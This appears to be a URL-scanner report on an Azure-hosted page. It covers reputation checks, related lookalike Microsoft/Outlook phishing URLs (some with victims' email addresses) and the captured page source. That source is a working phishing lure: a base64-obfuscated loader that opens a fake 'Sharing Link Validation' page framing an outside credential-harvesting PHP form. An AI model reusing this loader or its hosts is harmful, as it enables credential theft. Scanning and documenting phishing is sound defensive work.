https://tunity.blob.core.windows.net/pcttwety/hurse.html?sp=r&st=2021-02-09T19:39:31Z&se=2021-02-15T03:39:31Z&spr=https&sv=2019-12-12&sr=b&sig=9%2BtKLrgLS2fLlwcLVy6RfCRQTyIbIg6yhJWYDoJltrE%3D

Last Checked: Feb 09, 2021, 15:31 EST

IP Address: 20.60.30.68
ASN #: AS8075 MICROSOFT-CORP-MSN-AS-BLOCK, US
Location: Des Moines, Iowa, US
URL Reputation:
  • Unknown This URL is not identified as malicious in the PhishTank Database.
  • Unknown PhishCheck thinks this URL is likely not a phish.
  • Unknown OpenPhish: URL not in feed.

Other submissions on 20.60.30.68:

  • http://onedriveclubproddm20044.blob.core.windows.net/

Other submissions on windows.net:

  • https://wwwhgfoutlookofficeowa.blob.core.windows.net/auth/vmnotemessage.html#unknown@citi.com

  • http://eusaaomssa.blob.core.windows.net/

  • https://michealmicheal8.blob.core.windows.net/owe8/update8.html?sp=r&st=2019-06-26T12:29:58Z&se=2019-06-27T12:29:58Z&spr=https&sv=2018-03-28&sig=baEg4D%2B0GnQ6zvohhc5tz5pi5xzT5DTbUyVgN9gpbQE%3D&sr=b#'+em

  • http://michealmicheal8.blob.core.windows.net/

  • https://were12.z19.web.core.windows.net/

  • http://outllokoffice864mail.z16.web.core.windows.net/

  • https://wwwhgfoutlookofficeowa.blob.core.windows.net/auth/vmnotemessage.html

  • https://mailgurddelivery.z35.web.core.windows.net/?https://login.blockchain.com/en

  • https://maling356accountonline.blob.core.windows.net/mailingsupport356-microsoft/index.html

  • http://jimmy1.z19.web.core.windows.net/#anthony.vidovich@aig.com

Previous checks:

                               fgets: Connection reset by peer

                             
  • GET
    200 OK

    https://tunity.blob.core.windows.net/pcttwety/hurse.html?sp=r&st=2021-02-09T19:39:31Z&se=2021-02-15T03:39:31Z&spr=https&sv=2019-12-12&sr=b&sig=9%2BtKLrgLS2fLlwcLVy6RfCRQTyIbIg6yhJWYDoJltrE%3D

  • GET
    303 See Other

    https://snippets.cdn.mozilla.net/6/Firefox/85.0/20210118153634/Linux_x86_64-gcc3/en-US/release-cck-ubuntu/Linux%204.15.0-126-generic%20(GTK%203.22.30%2Clibpulse%20not-available)/canonical/1.0/

  • GET
    200 OK

    https://snippets.cdn.mozilla.net/us-west/bundles-pregen/Firefox/en-us/default.json

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv4

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv6

  • GET
    200 OK

    https://i.imgur.com/xlrG8zE.jpg

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt

  • GET
    400 One of the request inputs is out of range.

    https://tunity.blob.core.windows.net/favicon.ico

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv4

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv6

  • https://snippets.cdn.mozilla.net/6/Firefox/85.0/20210118153634/Linux_x86_64-gcc3/en-US/release-cck-ubuntu/Linux%204.15.0-126-generic%20(GTK%203.22.30%2Clibpulse%20not-available)/canonical/1.0/ https://snippets.cdn.mozilla.net/us-west/bundles-pregen/Firefox/en-us/default.json
<html><head></head><body>

<script>
var isNS = (navigator.appName == "Netscape") ? 1 : 0;
if(navigator.appName == "Netscape") document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
return false;
}
function mousehandler(e){
var myevent = (isNS) ? e : event;
var eventbutton = (isNS) ? myevent.which : myevent.button;
if((eventbutton==2)||(eventbutton==3)) return false;
}
document.oncontextmenu = mischandler;
document.onmousedown = mousehandler;
document.onmouseup = mousehandler;
</script>


<br> <img src="https://i.imgur.com/xlrG8zE.jpg" style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:-5000;" onclick="debugBase64('data:text/html;base64,PGh0bWw+DQo8aGVhZD4NCjxzdHlsZT4NCmJvZHkgew0KICAgIG1hcmdpbjogMDsNCn0NCjwvc3R5bGU+DQo8U0NSSVBUIFRZUEU9InRleHQvamF2YXNjcmlwdCI+DQovL0Rpc2FibGUgcmlnaHQgY2xpY2sgc2NyaXB0DQp2YXIgbWVzc2FnZSA9ICIiOw0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCmZ1bmN0aW9uIGNsaWNrSUUoKSB7DQogICAgaWYgKGRvY3VtZW50LmFsbCkgew0KICAgICAgICAobWVzc2FnZSk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQp9DQoNCmZ1bmN0aW9uIGNsaWNrTlMoZSkgew0KICAgIGlmIChkb2N1bWVudC5sYXllcnMgfHwgKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkICYmICFkb2N1bWVudC5hbGwpKSB7DQogICAgICAgIGlmIChlLndoaWNoID09IDIgfHwgZS53aGljaCA9PSAzKSB7DQogICAgICAgICAgICAobWVzc2FnZSk7DQogICAgICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgICAgIH0NCiAgICB9DQp9DQppZiAoZG9jdW1lbnQubGF5ZXJzKSB7DQogICAgZG9jdW1lbnQuY2FwdHVyZUV2ZW50cyhFdmVudC5NT1VTRURPV04pOw0KICAgIGRvY3VtZW50Lm9ubW91c2Vkb3duID0gY2xpY2tOUzsNCn0gZWxzZSB7DQogICAgZG9jdW1lbnQub25tb3VzZXVwID0gY2xpY2tOUzsNCiAgICBkb2N1bWVudC5vbmNvbnRleHRtZW51ID0gY2xpY2tJRTsNCn0NCg0KZG9jdW1lbnQub25jb250ZXh0bWVudSA9IG5ldyBGdW5jdGlvbigicmV0dXJuIGZhbHNlIikNCjwvU0NSSVBUPg0KDQo8dGl0bGU+JiN4NTM7JiN4Njg7JiN4NjE7JiN4NzI7JiN4Njk7JiN4NmU7JiN4Njc7JiN4MjA7JiN4NGM7JiN4Njk7JiN4NmU7JiN4NmI7JiN4MjA7JiN4NTY7JiN4NjE7JiN4NmM7JiN4Njk7JiN4NjQ7JiN4NjE7JiN4NzQ7JiN4Njk7JiN4NmY7JiN4NmU7PC90aXRsZT48bWV0YSBuYW1lPSJST0JPVFMiIGNvbnRlbnQ9Ik5PSU5ERVgiPg0KPGxpbmsgcmVsPSJTSE9SVENVVCBJQ09OIiBocmVmPSImI3g2ODsmI3g3NDsmI3g3NDsmI3g3MDsmI3g3MzsmI3gzYTsmI3gyZjsmI3gyZjsmI3g2MzsmI3gyZTsmI3g3MzsmI3gyZDsmI3g2ZDsmI3g2OTsmI3g2MzsmI3g3MjsmI3g2ZjsmI3g3MzsmI3g2ZjsmI3g2NjsmI3g3NDsmI3gyZTsmI3g2MzsmI3g2ZjsmI3g2ZDsmI3gyZjsmI3g2NjsmI3g2MTsmI3g3NjsmI3g2OTsmI3g2MzsmI3g2ZjsmI3g2ZTsmI3gyZTsmI3g2OTsmI3g2MzsmI3g2ZjsmI3gzZjsmI3g3NjsmI3gzMjsiLz4NCjwvaGVhZD4NCjxib2R5IG9uY29udGV4dG1lbnU9InJldHVybiBmYWxzZTsiPg0KPGlmcmFtZSBvbmNvbnRleHRtZW51PSJyZXR1cm4gZmFsc2U7IiBzcmM9Imh0dHBzOi8vZm9vZHNvZnNvdXRoLmNvbS9zaGFyay9jb2NvL2luZGV4LnBocCIgc3R5bGU9Im91dGxpbmU6bm9uZTsgYm9yZGVyOiAwOyB3aWR0aDogMTAwJTsgaGVpZ2h0OiAxMDAlOyI+UGxlYXNlIHVwZ3JhZGUgeW91ciBicm93c2VyLjwvaWZyYW1lPg0KPC9ib2R5Pg0KPC9odG1sPg==')"> "<br>



<script>
/**
 * Display a base64 URL inside an iframe in another window.
 */
function debugBase64(base64URL){
    var win = window.open();
    win.document.write('<iframe src="' + base64URL  + '" frameborder="0" style="border:0; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%;" allowfullscreen></iframe>');
}

</script></body></html>

                             

Screenshot: